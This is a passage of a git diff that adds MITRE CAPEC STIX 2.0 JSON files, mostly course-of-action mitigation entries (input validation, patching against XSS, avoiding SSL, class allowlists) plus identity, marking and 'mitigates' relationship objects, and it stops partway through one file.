"course-of-action--e818356e-b136-4fb6-a5f6-5e4208739ef7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-275-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a.json new file mode 100644 index 0000000000000000000000000000000000000000..4c4a1caff4820b3f9946064629c5851bff5ed97b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4afadb2b-fdf1-43e7-9d21-1d2391616701", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a security concept of operations (CONOPS) for the development environment that includes: Maintaining strict security administration and configuration management of requirements management and database tools, software design tools, configuration management tools, compilers, system build tools, and software performance testing and load testing tools.", + "id": "course-of-action--eac781ab-b6c7-461d-8b6b-bef86f30b33a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-670-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937.json new file mode 100644 index 0000000000000000000000000000000000000000..5c33e7320fe2aede18685b56b8e3d55a278f642b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--1a7926a3-20c4-4176-b406-1f06fcce29c2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use SSL, as all SSL versions have been broken and should not be used. If TLS is not an option for the client or server, consider setting timeouts on SSL sessions to extremely low values to lessen the potential impact.", + "id": "course-of-action--ecba1c64-8441-4563-b7ac-2cd839ac9937", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-217-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec.json new file mode 100644 index 0000000000000000000000000000000000000000..17e12f0a11d0ca7ae4a292becd1b0fb232fa46ca --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--0bec8fae-cc3f-4ea6-989b-14d100db29e7", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect and quarantine software with known virus.", + "id": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-442-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220.json new file mode 100644 index 0000000000000000000000000000000000000000..52c26019078213b066b7ac79958b4b9f86f05888 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--6981ded8-df85-471f-b1a1-8c5477f26bf0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use load balancing mechanisms", + "id": "course-of-action--f1bbdc64-6921-4303-9b24-7f7f5e1d7220", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-469-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f5210720-4324-4516-a229-f892a14476e3.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f5210720-4324-4516-a229-f892a14476e3.json new file mode 100644 index 0000000000000000000000000000000000000000..c730b39540f77f0ea5e760155d34a866f2fbdda8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f5210720-4324-4516-a229-f892a14476e3.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f3d0ea34-6f1b-433c-bfed-d423e73465f6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.", + "id": "course-of-action--f5210720-4324-4516-a229-f892a14476e3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-132-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8.json new file mode 100644 index 0000000000000000000000000000000000000000..e64ca7c1b372a08d146ebfedd77925bdef17ddaa --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f6a37ddb-253f-4a35-8ba9-a4f4a5bca6c2", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a Software Assurance Plan that includes maintaining strict configuration management control of source code, object code and software development, build and distribution tools; manual code reviews and static code analysis for developmental software; and tracking of all storage and movement of code.", + "id": "course-of-action--f7f5f2ab-7b9b-473b-9e09-91793b1951d8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-669-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371.json new file mode 100644 index 0000000000000000000000000000000000000000..8c2bc7dd6cd3a604b0fc1f964dbdba191154eae5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--9622b385-6784-4cfe-8fc7-50bb870e75aa", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests", + "id": "course-of-action--fa76a44a-7309-4edc-96e7-8994b9b72371", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-460-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json new file mode 100644 index 0000000000000000000000000000000000000000..20e964e35d780e9a722f00bd83de6843c7a91dfd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ab044d1b-b641-4c8b-86bf-d789a8988dd4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json new file mode 100644 index 0000000000000000000000000000000000000000..76ad28470211473602e958517f4749929c0d839d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fe7566f1-8e07-4f50-9a15-773a7b0bc9c3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain multiple instances of the document across different privileged users for recovery and verification.", + "id": "course-of-action--fc3f236d-f464-45dc-add7-aa341dd57c05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-519-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json new file mode 100644 index 0000000000000000000000000000000000000000..2d25c817d4f092f0f18e0aaa82dc82a481558607 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fd074c08-b558-4f44-9324-59884001bdfd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", + "id": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json new file mode 100644 index 0000000000000000000000000000000000000000..20120056171a6731c5fe2725b1f3a442b17f4be9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c07965c7-85b8-4548-9f03-3ee83ef4c7bb", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for all content.", + "id": "course-of-action--fd7e89e0-c911-4768-a127-580a58a1c1bc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-240-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json new file mode 100644 index 0000000000000000000000000000000000000000..b2d23694c2cebe6a1f6d5559b8df67d7a49497ca --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--9b7b913d-8808-43cf-93d0-f04f51519a72", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Change default passwords by choosing strong passwords.", + "id": "course-of-action--fda07ec7-6ba2-4707-9f4e-4954e8e6abe7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-169-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json new file mode 100644 index 0000000000000000000000000000000000000000..ca99f34fb122e65c2e1b08b25b15c8cc9a402b3b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--79f97475-6499-4112-b864-4e6aa65e81c0", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json new file mode 100644 index 0000000000000000000000000000000000000000..f33e536fcbb7dbfa938b59acf7d183c78180c2ad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fdda562a-133a-447b-9a9c-764b70f09841.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--c8d5fdeb-544e-42dd-87bd-5dced70b7e44", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design the communication system such that it associates proper authentication/authorization with each channel/message.", + "id": "course-of-action--fdda562a-133a-447b-9a9c-764b70f09841", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-216-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json new file mode 100644 index 0000000000000000000000000000000000000000..902f3f45247ee0c636abf10ff3da9ec5e18e8cc8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--1f8a2ee9-1b4f-487b-b7eb-15d53152d47b", + "objects": [ + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json new file mode 100644 index 0000000000000000000000000000000000000000..2e7a8aec17e3d1c006a59201f756af48d664b914 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--fe9d8853-a306-4443-b34e-d9d755890734.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f43bdb0a-9101-4506-bca1-ced2d4e117b4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--feb21138-cc49-427c-a020-0515522bd9d7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--feb21138-cc49-427c-a020-0515522bd9d7.json new file mode 100644 index 0000000000000000000000000000000000000000..93f22661d02be07386d7eafd45de8ade3a4175e8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--feb21138-cc49-427c-a020-0515522bd9d7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--48c3bdde-5746-4e5b-9d04-20c3388cb6cf", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make use of OTA (Over-the-air) updates so that firmware can be patched remotely either through manual or automatic means", + "id": "course-of-action--feb21138-cc49-427c-a020-0515522bd9d7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json new file mode 100644 index 0000000000000000000000000000000000000000..f122e4435a62c362840b014f604e60db4730370d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--092313f6-c871-43ff-aa09-fb55df0fc04a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json new file mode 100644 index 0000000000000000000000000000000000000000..f6c2698b7286744c019fe6a26be26429155806fe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--aca9c5a4-d85c-43b9-9b67-6e6038724826", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json b/cti-ATT-CK-v13.1/capec/2.0/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json new file mode 100644 index 0000000000000000000000000000000000000000..51a0628ab2bb11f46708a1d29dbc8011ca6dfdad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/identity/identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd.json @@ -0,0 +1,18 @@ +{ + "id": "bundle--436fd92b-159d-48e5-a990-a7df3974035e", + "objects": [ + { + "created": "2023-01-30T20:31:22.121Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:31:22.121Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "identity" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json b/cti-ATT-CK-v13.1/capec/2.0/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json new file mode 100644 index 0000000000000000000000000000000000000000..f60e79f1a61a391fc77c7dfaec4f6e01653ac1cb --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/marking-definition/marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d.json @@ -0,0 +1,16 @@ +{ + "id": "bundle--b31f6f83-0a45-4e15-9146-94eef3f70eb4", + "objects": [ + { + "created": "2023-01-30T20:31:22.120362Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "type": "marking-definition" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json new file mode 100644 index 0000000000000000000000000000000000000000..d73a8b0a14ccd2f72aff863d9ada4c6522217310 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--2137b252-d78a-41e8-8b4e-db821177ee7a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json new file mode 100644 index 0000000000000000000000000000000000000000..545a9240a44815c684ef61232848cc94019430c9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002041eb-05e7-4cd3-ba28-e881bb148370.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--eda37305-3abd-4464-9277-ebf624c41cba", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002041eb-05e7-4cd3-ba28-e881bb148370", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--426e0345-2074-48c8-9a3d-b7f7550e3712", + "target_ref": "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json new file mode 100644 index 0000000000000000000000000000000000000000..252cf9554383090f3e9a23fb0ad799243aa663a7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--002a4543-59cc-405d-b6f7-835ee0f6b124.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--211e98d3-76bf-4d2f-bdac-f65566edcc69", + "objects": [ + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--002a4543-59cc-405d-b6f7-835ee0f6b124", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--177c82cf-28a6-4bec-ad88-7f539639ef51", + "target_ref": "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": 